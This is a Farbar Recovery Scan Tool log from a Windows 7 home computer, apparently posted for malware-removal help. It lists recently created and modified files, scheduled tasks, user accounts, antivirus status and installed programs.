2017-11-26 08:20 - 2017-11-26 08:20 - 000000000 ____D C:\Users\sheri\AppData\Local\ServiceHub
2017-11-26 08:18 - 2017-11-26 08:18 - 001077184 _____ (Microsoft Corporation) C:\Users\sheri\Downloads\vs_Community.exe
2017-11-26 08:09 - 2010-06-02 04:55 - 000527192 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_7.dll
2017-11-26 08:09 - 2010-06-02 04:55 - 000239960 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_7.dll
2017-11-26 08:09 - 2010-06-02 04:55 - 000074072 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_5.dll
2017-11-26 08:09 - 2010-05-26 11:41 - 002106216 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_43.dll
2017-11-26 08:09 - 2010-05-26 11:41 - 001998168 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_43.dll
2017-11-26 08:09 - 2010-05-26 11:41 - 001868128 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_43.dll
2017-11-26 08:09 - 2010-05-26 11:41 - 000470880 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_43.dll
2017-11-26 08:09 - 2010-05-26 11:41 - 000248672 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_43.dll
2017-11-26 08:09 - 2010-02-04 10:01 - 000528216 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_6.dll
2017-11-26 08:09 - 2010-02-04 10:01 - 000238936 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_6.dll
2017-11-26 08:09 - 2010-02-04 10:01 - 000074072 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_4.dll
2017-11-26 08:09 - 2010-02-04 10:01 - 000022360 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_7.dll
2017-11-26 08:09 - 2009-09-04 17:44 - 000515416 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_5.dll
2017-11-26 08:09 - 2009-09-04 17:44 - 000238936 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_5.dll
2017-11-26 08:09 - 2009-09-04 17:44 - 000069464 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_3.dll
2017-11-26 08:09 - 2009-09-04 17:29 - 005501792 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_42.dll
2017-11-26 08:09 - 2009-09-04 17:29 - 001974616 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_42.dll
2017-11-26 08:09 - 2009-09-04 17:29 - 001892184 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_42.dll
2017-11-26 08:09 - 2009-09-04 17:29 - 000453456 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_42.dll
2017-11-26 08:09 - 2009-09-04 17:29 - 000235344 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_42.dll
2017-11-26 08:09 - 2009-03-16 14:18 - 000517448 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_4.dll
2017-11-26 08:09 - 2009-03-16 14:18 - 000235352 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_4.dll
2017-11-26 08:09 - 2009-03-16 14:18 - 000022360 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_6.dll
2017-11-26 08:09 - 2009-03-09 15:27 - 004178264 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_41.dll
2017-11-26 08:09 - 2009-03-09 15:27 - 001846632 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_41.dll
2017-11-26 08:09 - 2009-03-09 15:27 - 000453456 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_41.dll
2017-11-26 08:09 - 2008-10-27 10:04 - 000514384 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_3.dll
2017-11-26 08:09 - 2008-10-27 10:04 - 000235856 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_3.dll
2017-11-26 08:09 - 2008-10-27 10:04 - 000070992 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_2.dll
2017-11-26 08:09 - 2008-10-27 10:04 - 000023376 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_5.dll
2017-11-26 08:09 - 2008-10-10 04:52 - 004379984 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_40.dll
2017-11-26 08:09 - 2008-10-10 04:52 - 002036576 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_40.dll
2017-11-26 08:09 - 2008-10-10 04:52 - 000452440 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_40.dll
2017-11-26 08:09 - 2008-07-31 10:41 - 000238088 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_2.dll
2017-11-26 08:09 - 2008-07-31 10:41 - 000068616 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_1.dll
2017-11-26 08:09 - 2008-07-31 10:40 - 000509448 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_2.dll
2017-11-26 08:09 - 2008-07-10 11:01 - 000467984 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_39.dll
2017-11-26 08:09 - 2008-07-10 11:00 - 003851784 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_39.dll
2017-11-26 08:09 - 2008-07-10 11:00 - 001493528 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_39.dll
2017-11-26 08:09 - 2008-05-30 14:19 - 000507400 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_1.dll
2017-11-26 08:09 - 2008-05-30 14:18 - 000238088 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_1.dll
2017-11-26 08:09 - 2008-05-30 14:17 - 000065032 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_0.dll
2017-11-26 08:09 - 2008-05-30 14:17 - 000025608 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_4.dll
2017-11-26 08:09 - 2008-05-30 14:11 - 003850760 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_38.dll
2017-11-26 08:09 - 2008-05-30 14:11 - 001491992 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_38.dll
2017-11-26 08:09 - 2008-05-30 14:11 - 000467984 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_38.dll
2017-11-26 08:09 - 2008-03-05 16:03 - 000479752 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_0.dll
2017-11-26 08:09 - 2008-03-05 16:03 - 000238088 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_0.dll
2017-11-26 08:09 - 2008-03-05 16:00 - 000025608 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_3.dll
2017-11-26 08:09 - 2008-03-05 15:56 - 003786760 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_37.dll
2017-11-26 08:09 - 2008-03-05 15:56 - 001420824 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_37.dll
2017-11-26 08:09 - 2008-02-05 23:07 - 000462864 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_37.dll
2017-11-26 08:09 - 2007-10-22 03:39 - 000267272 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_10.dll
2017-11-26 08:09 - 2007-10-22 03:37 - 000017928 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_2.dll
2017-11-26 08:09 - 2007-10-12 15:14 - 003734536 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_36.dll
2017-11-26 08:09 - 2007-10-12 15:14 - 001374232 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_36.dll
2017-11-26 08:09 - 2007-10-02 09:56 - 000444776 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_36.dll
2017-11-26 08:09 - 2007-07-20 00:57 - 000267112 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_9.dll
2017-11-26 08:09 - 2007-07-19 18:14 - 003727720 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_35.dll
2017-11-26 08:09 - 2007-07-19 18:14 - 001358192 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_35.dll
2017-11-26 08:09 - 2007-07-19 18:14 - 000444776 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_35.dll
2017-11-26 08:09 - 2007-06-20 20:46 - 000266088 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_8.dll
2017-11-26 08:09 - 2007-05-16 16:45 - 003497832 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_34.dll
2017-11-26 08:09 - 2007-05-16 16:45 - 001124720 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_34.dll
2017-11-26 08:09 - 2007-05-16 16:45 - 000443752 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_34.dll
2017-11-26 08:09 - 2007-04-04 18:55 - 000261480 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_7.dll
2017-11-26 08:09 - 2007-04-04 18:53 - 000081768 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_3.dll
2017-11-26 08:09 - 2007-03-15 16:57 - 000443752 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_33.dll
2017-11-26 08:09 - 2007-03-12 16:42 - 003495784 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_33.dll
2017-11-26 08:09 - 2007-03-12 16:42 - 001123696 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_33.dll
2017-11-26 08:09 - 2007-03-05 12:42 - 000015128 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_1.dll
2017-11-26 08:09 - 2007-01-24 15:27 - 000255848 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_6.dll
2017-11-26 08:09 - 2006-12-08 12:02 - 000251672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_5.dll
2017-11-26 08:09 - 2006-11-29 13:06 - 003426072 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_32.dll
2017-11-26 08:09 - 2006-11-29 13:06 - 000440080 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10.dll
2017-11-26 08:09 - 2006-09-28 16:05 - 002414360 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_31.dll
2017-11-26 08:09 - 2006-09-28 16:05 - 000237848 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_4.dll
2017-11-26 08:09 - 2006-07-28 09:30 - 000236824 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_3.dll
2017-11-26 08:09 - 2006-07-28 09:30 - 000062744 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_2.dll
2017-11-26 08:09 - 2006-05-31 07:24 - 000230168 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_2.dll
2017-11-26 08:09 - 2006-03-31 12:40 - 002388176 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_30.dll
2017-11-26 08:09 - 2006-03-31 12:39 - 000229584 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_1.dll
2017-11-26 08:09 - 2006-03-31 12:39 - 000062672 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_1.dll
2017-11-26 08:09 - 2006-02-03 08:43 - 002332368 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_29.dll
2017-11-26 08:09 - 2006-02-03 08:42 - 000230096 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_0.dll
2017-11-26 08:09 - 2006-02-03 08:41 - 000014032 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_0.dll
2017-11-26 08:09 - 2005-12-05 18:09 - 002323664 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_28.dll
2017-11-26 08:09 - 2005-07-22 19:59 - 002319568 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_27.dll
2017-11-26 08:09 - 2005-05-26 15:34 - 002297552 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_26.dll
2017-11-26 08:09 - 2005-03-18 17:19 - 002337488 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_25.dll
2017-11-26 08:09 - 2005-02-05 19:45 - 002222800 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_24.dll
2017-11-26 08:08 - 2017-11-26 08:09 - 000000000 ___HD C:\Windows\msdownld.tmp
2017-11-26 08:08 - 2017-11-26 08:09 - 000000000 ____D C:\Windows\system32\directx
2017-11-26 08:06 - 2017-11-26 08:06 - 000000000 ____D C:\Program Files\Common Files\Java
2017-11-26 08:05 - 2017-11-26 08:05 - 000095808 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2017-11-26 08:05 - 2017-11-26 08:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-11-26 08:05 - 2017-11-26 08:05 - 000000000 ____D C:\Program Files\Java
2017-11-26 07:58 - 2017-11-26 07:59 - 009385872 _____ (Adobe Systems Inc.) C:\Users\sheri\Downloads\Shockwave_Installer_Full.exe
2017-11-26 07:46 - 2017-11-26 07:46 - 000298216 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvmf6232.sys
2017-11-17 11:07 - 2017-11-17 11:07 - 000052390 _____ C:\ProgramData\1510945611.bdinstall.bin
2017-11-17 11:06 - 2017-11-17 11:06 - 000022336 _____ C:\ProgramData\agent.uninstall.1510945574.bdinstall.bin
2017-11-17 08:19 - 2017-11-17 08:19 - 000070959 _____ C:\ProgramData\1510935518.bdinstall.bin
2017-11-17 08:19 - 2017-11-17 08:19 - 000000000 ____D C:\Program Files\Common Files\Bitdefender
2017-11-17 08:18 - 2017-11-17 11:07 - 000000000 ____D C:\Program Files\Bitdefender
2017-11-16 22:55 - 2017-11-17 11:07 - 000000000 ____D C:\ProgramData\Bitdefender
2017-11-16 22:54 - 2017-11-16 22:54 - 000000000 ____D C:\Users\sheri\AppData\Roaming\QuickScan
2017-11-16 22:47 - 2017-11-18 04:51 - 000000000 ____D C:\Program Files\Bitdefender Agent
2017-11-16 22:47 - 2017-11-16 22:47 - 000047148 _____ C:\ProgramData\agent.1510901256.bdinstall.bin
2017-11-15 07:11 - 2017-10-11 16:37 - 011410944 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2017-11-15 07:11 - 2017-10-11 16:37 - 001549824 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2017-11-15 07:11 - 2017-10-11 16:37 - 001363968 _____ (Microsoft Corporation) C:\Windows\system32\Query.dll
2017-11-15 07:10 - 2017-10-17 18:16 - 000114408 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-11-15 07:10 - 2017-10-17 18:11 - 000488448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-11-15 07:10 - 2017-10-17 17:55 - 000285696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000259584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000046592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000020480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000006016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2017-11-15 07:10 - 2017-10-16 14:49 - 001213672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2017-11-15 07:10 - 2017-10-16 13:55 - 000339968 _____ (Microsoft Corporation) C:\Windows\system32\msexcl40.dll
2017-11-15 07:10 - 2017-10-15 14:04 - 000313184 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2017-11-15 07:10 - 2017-10-11 16:40 - 000308456 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 012574208 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2017-11-15 07:10 - 2017-10-11 16:37 - 001400320 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000666624 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000337408 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000197120 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000111104 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000104448 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000059392 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2017-11-15 07:10 - 2017-10-11 16:26 - 000427520 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2017-11-15 07:10 - 2017-10-11 16:26 - 000164352 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2017-11-15 07:10 - 2017-10-11 16:25 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2017-11-15 07:10 - 2017-10-11 16:25 - 000009728 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2017-11-15 07:10 - 2017-10-11 16:24 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2017-11-15 07:10 - 2017-10-11 16:24 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2017-11-15 07:10 - 2017-10-11 16:24 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2017-11-15 07:10 - 2017-10-11 16:16 - 000034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2017-11-15 07:10 - 2017-10-11 16:14 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\luafv.sys
2017-11-15 07:10 - 2017-10-04 05:04 - 001918464 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2017-11-15 07:10 - 2017-10-04 05:04 - 001321472 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-11-15 07:10 - 2017-10-04 05:04 - 000541696 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-11-15 07:10 - 2017-10-04 05:04 - 000509440 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-11-15 07:10 - 2017-10-04 05:04 - 000303616 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-11-15 07:10 - 2017-10-04 05:04 - 000193536 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-11-15 07:10 - 2017-10-04 05:04 - 000150016 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2017-11-14 13:41 - 2017-11-14 13:41 - 000165925 _____ C:\Users\sheri\Documents\Scan_0003.pdf

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-12-13 07:32 - 2009-07-13 20:34 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-12-13 07:32 - 2009-07-13 20:34 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-12-13 07:00 - 2017-09-16 12:00 - 000000994 _____ C:\Windows\Tasks\Yahoo! Powered totes.job
2017-12-13 07:00 - 2017-09-16 12:00 - 000000000 ____D C:\ProgramData\{C7F70294-4DB5-8852-CB73-161051319DDE}
2017-12-13 06:45 - 2009-07-13 18:37 - 000000000 ____D C:\Windows\inf
2017-12-13 06:27 - 2009-07-13 20:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-12-13 05:53 - 2010-11-20 13:01 - 000781298 _____ C:\Windows\system32\PerfStringBackup.INI
2017-12-13 05:32 - 2017-03-14 18:26 - 000000000 ____D C:\Users\sheri\AppData\Local\ElevatedDiagnostics
2017-12-13 05:18 - 2017-03-14 18:49 - 000000000 ____D C:\Windows\pss
2017-12-13 05:00 - 2016-10-31 07:00 - 000000000 ____D C:\Users\sheri\AppData\Local\VirtualStore
2017-12-13 04:40 - 2017-02-04 04:07 - 000000000 ____D C:\Users\sheri\AppData\Local\Adobe
2017-12-13 04:28 - 2017-02-05 00:15 - 000000376 _____ C:\Windows\Tasks\update-sys.job
2017-12-13 04:28 - 2009-07-13 20:33 - 000489496 _____ C:\Windows\system32\FNTCACHE.DAT
2017-12-13 04:27 - 2009-07-13 18:37 - 000000000 ____D C:\Windows\system32\Setup
2017-12-13 02:31 - 2017-02-05 00:06 - 000000000 ____D C:\Windows\system32\MRT
2017-12-13 02:26 - 2017-10-11 19:21 - 130448288 ____C (Microsoft Corporation) C:\Windows\system32\MRT-KB890830.exe
2017-12-13 02:26 - 2017-02-05 00:05 - 130448288 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-12-13 01:09 - 2017-02-04 04:08 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2017-12-13 01:09 - 2017-02-04 04:08 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2017-12-13 01:09 - 2017-02-04 04:08 - 000000000 ____D C:\Windows\system32\Macromed
2017-12-12 11:38 - 2017-09-16 12:00 - 000000000 ____D C:\Users\sheri\AppData\Roaming\397997B4-6E82-BE01-C692-08C19D3204DC
2017-12-12 08:25 - 2017-02-04 04:18 - 000148688 _____ C:\Users\sheri\AppData\Local\GDIPFONTCACHEV1.DAT
2017-12-12 08:07 - 2016-10-31 07:13 - 000000000 ____D C:\Users\sheri\AppData\Local\Google
2017-12-12 07:51 - 2017-02-05 00:15 - 000000376 _____ C:\Windows\Tasks\update-S-1-5-21-3948143356-924845713-1080013463-1000.job
2017-12-12 06:06 - 2017-02-04 05:25 - 050814976 _____ C:\Windows\system32\config\SOFTWARE.iobit
2017-12-12 06:06 - 2017-02-04 05:25 - 001400832 _____ C:\Windows\system32\config\DEFAULT.iobit
2017-12-12 06:06 - 2017-02-04 05:25 - 000024576 _____ C:\Windows\system32\config\SECURITY.iobit
2017-12-12 06:06 - 2017-02-04 05:25 - 000024576 _____ C:\Windows\system32\config\SAM.iobit
2017-12-11 21:35 - 2017-02-04 04:52 - 000000000 ____D C:\Users\sheri\AppData\Roaming\IMVU
2017-12-11 16:53 - 2017-05-30 14:41 - 000000000 ____D C:\Users\sheri\AppData\Local\Roblox
2017-12-11 05:38 - 2017-09-08 05:18 - 000000000 ____D C:\Users\sheri\Desktop\IMPORTANT
2017-12-08 03:26 - 2017-02-04 04:19 - 000000000 ____D C:\ProgramData\ProductData
2017-12-05 05:26 - 2009-07-13 20:53 - 000032538 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-12-04 10:10 - 2016-10-31 07:00 - 000000000 ____D C:\Users\sheri
2017-12-04 04:05 - 2009-07-13 18:37 - 000000000 ____D C:\Windows\rescache
2017-12-02 21:09 - 2017-02-09 05:14 - 030924800 _____ C:\Windows\system32\config\COMPONENTS.iobit
2017-11-27 21:43 - 2017-02-05 20:03 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2017-11-27 21:43 - 2017-02-04 04:52 - 000000000 ____D C:\Users\sheri\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IMVU
2017-11-26 08:41 - 2017-02-04 04:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare
2017-11-26 08:41 - 2017-02-04 04:18 - 000000000 ____D C:\ProgramData\IObit
2017-11-26 08:22 - 2017-02-04 04:33 - 000000000 ____D C:\ProgramData\NVIDIA
2017-11-26 08:19 - 2017-04-03 08:14 - 000000000 ____D C:\Program Files\Microsoft Visual Studio
2017-11-26 08:06 - 2017-02-04 04:33 - 000000000 ____D C:\ProgramData\Oracle
2017-11-26 07:59 - 2017-02-04 04:09 - 000000000 ____D C:\Windows\system32\Adobe
2017-11-26 07:46 - 2017-02-04 04:31 - 000953856 _____ (NVIDIA Corporation) C:\Windows\system32\fdco2.dll
2017-11-26 07:46 - 2017-02-04 04:31 - 000758784 _____ (NVIDIA Corporation) C:\Windows\system32\cohelper.dll
2017-11-26 07:46 - 2017-02-04 04:31 - 000240232 _____ (NVIDIA Corporation) C:\Windows\system32\nvconrm.dll
2017-11-26 07:46 - 2017-02-04 04:31 - 000011164 _____ C:\Windows\system32\Drivers\nvphy.bin
2017-11-26 07:46 - 2017-02-04 04:30 - 000604776 _____ (NVIDIA Corporation) C:\Windows\system32\nvuninst.exe
2017-11-21 19:01 - 2017-02-04 04:52 - 000001829 _____ C:\Users\sheri\Desktop\Run IMVU.lnk
2017-11-20 12:32 - 2017-02-04 03:58 - 000450720 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2017-11-16 08:15 - 2017-11-06 08:57 - 000000000 ____D C:\Program Files\Panda Security
2017-11-16 08:15 - 2017-11-06 08:54 - 000000000 ____D C:\ProgramData\Panda Security
2017-11-16 08:11 - 2017-11-06 08:59 - 000000000 ____D C:\Users\sheri\AppData\Roaming\Panda Security
2017-11-16 01:14 - 2017-11-06 09:01 - 000000000 ____D C:\ProgramData\panda_url_filtering
2017-11-16 01:14 - 2017-02-04 23:04 - 000000000 ____D C:\Windows\system32\appraiser
2017-11-15 20:40 - 2016-10-31 07:14 - 000002101 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

==================== Files in the root of some directories =======

2017-11-06 09:17 - 2017-11-06 09:17 - 000000033 _____ () C:\Users\sheri\AppData\Roaming\AdobeWLCMCache.dat
2017-12-12 07:00 - 2017-12-13 07:00 - 000000052 _____ () C:\Users\sheri\AppData\Local\bpDLTbpDLT
2017-12-07 15:53 - 2017-12-07 15:53 - 000011138 _____ () C:\Users\sheri\AppData\Local\recently-used.xbel
2017-02-05 00:15 - 2017-02-05 00:15 - 000000003 _____ () C:\Users\sheri\AppData\Local\updater.log
2017-02-05 00:15 - 2017-05-08 07:38 - 000000413 _____ () C:\Users\sheri\AppData\Local\UserProducts.xml

Some files in TEMP:
====================
2017-12-13 06:00 - 2017-12-13 06:00 - 012686696 _____ (Reimage) C:\Users\sheri\AppData\Local\Temp\ReimagePackage.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-12-09 02:13

==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 13-12-2017
Ran by sheri (13-12-2017 07:45:53)
Running from C:\Users\sheri\Desktop
Microsoft Windows 7 Home Premium Service Pack 1 (X86) (2016-10-31 15:00:17)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3948143356-924845713-1080013463-500 - Administrator - Disabled)
Guest (S-1-5-21-3948143356-924845713-1080013463-501 - Limited - Disabled)
sheri (S-1-5-21-3948143356-924845713-1080013463-1000 - Administrator - Enabled) => C:\Users\sheri

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Creative Cloud (HKLM\...\Adobe Creative Cloud) (Version: 4.3.0.256 - Adobe Systems Incorporated)
Adobe Flash Player 28 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 28.0.0.126 - Adobe Systems Incorporated)
Adobe Flash Player 28 PPAPI (HKLM\...\Adobe Flash Player PPAPI) (Version: 28.0.0.126 - Adobe Systems Incorporated)
Adobe Illustrator CC 2018 (32 Bit) (HKLM\...\ILST_22_0_1_32) (Version: 22.0.1 - Adobe Systems Incorporated)
Adobe Photoshop CS6 version 13.0.1 (HKLM\...\{A724DC44-6241-42D3-BA57-778B178ABC17}_is1) (Version: 13.0.1 - Adobe Systems, Inc.)
Adobe Shockwave Player 11.5 (HKLM\...\Adobe Shockwave Player) (Version: 11.5.8.612 - Adobe Systems, Inc.)
Advanced SystemCare 11 (HKLM\...\Advanced SystemCare_is1) (Version: 11.0.3 - IObit)
